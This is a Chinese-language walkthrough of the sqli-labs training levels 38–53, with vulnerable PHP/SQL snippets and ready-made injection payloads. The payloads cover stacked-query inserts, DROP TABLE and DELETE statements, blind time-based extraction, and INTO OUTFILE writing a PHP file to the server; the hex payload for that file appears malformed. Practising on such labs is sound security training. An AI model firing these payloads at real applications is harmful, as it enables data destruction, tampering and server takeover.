less-38
源码:$sql="select * from users where id='$id' limit 0,1";
注入:?id=1';insert into users (id,username,password) values(12,'jack','jacl')--+
less-39
源码:$sql="select * from users where id=$id limit 0,1";
注入:?id=1;insert into users (id,username,password) values(12,'jack','jacl')--+
less-40
源码:$sql="select * from users where id=('$id') limit 0,1";
注入:?id=1');insert into users (id,username,password) values(12,'jack','jacl')--+
less-41:
和less-40一样,盲注
注入:?id=1;insert into users (id,username,password) values(13,'jack','jack')%23
less-42:
源码login.php:
$username=mysqli_real_escape_string($con1, $_POST['login_user']);
$password=$_POST["login_password"]; //password没有经过mysqli_real_escape_string过滤,直接拼接进SQL
$sql="select * from users where username='$username' and password='$password'";
注入:a';create table class like users#
less-43:
源码login.php:
漏洞同上,区别在于:$sql="select * from users where username=('$username') and password=('$password')";
注入:a');drop table class#
less-44:
没有任何报错信息,采用盲注
漏洞同less-42
注入:a';insert into class (id,username,password) values('11','jack','jack')#
less-45:
没有任何报错信息,采用盲注
漏洞同less-43
注入:a');delete from class where id=11#
less-46:
源码:$sql="select * from users order by $id";
尝试?sort=1 desc和?sort=1 asc, 显示结果不同,则表明可以注入,?sort=rand(true)和?sort=rand(false)的结果也不一样
1.报错注入:?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()), 0x3a,0x3a,floor(rand()*2)) limit 0,1)
2.延时注入:?sort=1 and if(ascii(substr(database(),1,1))=118,0,sleep(5))
3.添加注入语句
procedure analyse参数注入:?sort=1 procedure analyse(extractvalue(rand()*2, concat(0x3a,version())),1)
into outfile参数注入:?sort=1 into outfile "c:/data.txt"
less-47:
源码:$sql="select * from users order by '$id'"; //将数字型变成了字符型
1.and rand相结合
2.导入导出文件into outfile参数
?sort=1' into outfile "c:/data.txt"--+
利用lines terminated by上传木马
?sort=1' into outfile "c:/..../data.php" lines terminated by Ox3c3f604947501d3979--+(木马<? php phpinfo();?>进行16进制转换)
less-48:
与less-46的区别在于没有报错信息,盲注
?sort=(if(ascii(substr(database(),1,1))=116,0,sleep(5)))
less-49:
与less-47的区别在于没有报错信息,盲注
?sort=1' and (if(ascii(substr(select username from users limit 0,1),1,1))=69,0,sleep(1)))--+
less-50
源码:$sql="select * from users order by $id";
if (mysqli_multi_query($con1,$sql)) //mysqli_multi_query()可以执行多个sql语句,而mysqli_query()只能执行一个sql语句,因此这里存在堆叠注入
注入:?sort=1;create table jack like users#
less-51
源码:$sql="select * from users order by '$id'";
注入:?sort=1';drop table jack--+
less-52
同less-50,不过没有报错信息
注入:?sort=1;insert into users (id,username,password) values('16','jack','jack')--+
less-53
同less-51,不过没有报错信息,盲注
注入:?sort=1';delete from jack where id=16;--+